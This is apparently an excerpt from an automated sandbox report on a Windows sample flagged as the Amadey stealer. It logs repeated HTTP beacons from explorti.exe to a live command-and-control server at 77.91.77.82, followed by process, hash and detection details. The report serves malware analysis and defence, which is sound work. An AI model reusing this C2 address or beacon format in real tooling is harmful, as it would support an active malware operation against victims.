                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:47.861205101 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:48.087090969 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    42 | 192.168.2.4 | 49779 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:48.206718922 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:48.912866116 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:48.913644075 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:49.138216972 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    43 | 192.168.2.4 | 49780 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:49.253915071 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:49.960004091 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:49.960800886 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:50.179233074 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    44 | 192.168.2.4 | 49781 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:50.301326990 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:51.001724958 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:51.005486965 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:51.224138975 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    45 | 192.168.2.4 | 49782 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:51.332046032 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:52.044487000 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:52.047466040 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:52.267561913 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    46 | 192.168.2.4 | 49783 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:52.379122972 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:53.095915079 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:53.103115082 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:53.331283092 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    47 | 192.168.2.4 | 49784 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:53.447033882 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:54.148936033 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:54.149723053 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:54.371426105 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    48 | 192.168.2.4 | 49785 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:54.489471912 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:55.180836916 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:55.183578968 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:55.399924994 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    49 | 192.168.2.4 | 49786 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:55.523468971 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:56.233320951 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:56.235898972 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:56.455529928 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    50 | 192.168.2.4 | 49787 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:56.566483021 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:57.286765099 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:57.287595987 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:57.512305021 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    51 | 192.168.2.4 | 49788 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:57.628817081 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:58.319137096 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0



                    Target ID:0
                    Start time:23:08:52
                    Start date:04/07/2024
                    Path:C:\Users\user\Desktop\gNo9ad9KO4.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\gNo9ad9KO4.exe"
                    Imagebase:0x160000
                    File size:1'894'912 bytes
                    MD5 hash:C2197D56F08530AF4A35733CDA8CD2FD
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.1640045336.0000000005280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.1680219093.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:1
                    Start time:23:08:54
                    Start date:04/07/2024
                    Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                    Imagebase:0xe90000
                    File size:1'894'912 bytes
                    MD5 hash:C2197D56F08530AF4A35733CDA8CD2FD
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000003.1665651650.0000000004990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000002.1706078385.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 51%, Virustotal, Browse
                    Reputation:low
                    Has exited:true

                    Target ID:2
                    Start time:23:08:56
                    Start date:04/07/2024
                    Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Imagebase:0xe90000
                    File size:1'894'912 bytes
                    MD5 hash:C2197D56F08530AF4A35733CDA8CD2FD
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000002.1720834507.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000003.1680559275.0000000005660000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:7
                    Start time:23:10:00
                    Start date:04/07/2024
                    Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Imagebase:0xe90000
                    File size:1'894'912 bytes
                    MD5 hash:C2197D56F08530AF4A35733CDA8CD2FD
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000007.00000003.2319286062.0000000004810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                      Memory Dump Source
                      • Source File: 00000000.00000002.1682298985.0000000005490000.00000040.00001000.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5490000_gNo9ad9KO4.jbxd

                      Execution Graph

                      Execution Coverage:6.4%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:8.1%
                      Total number of Nodes:595
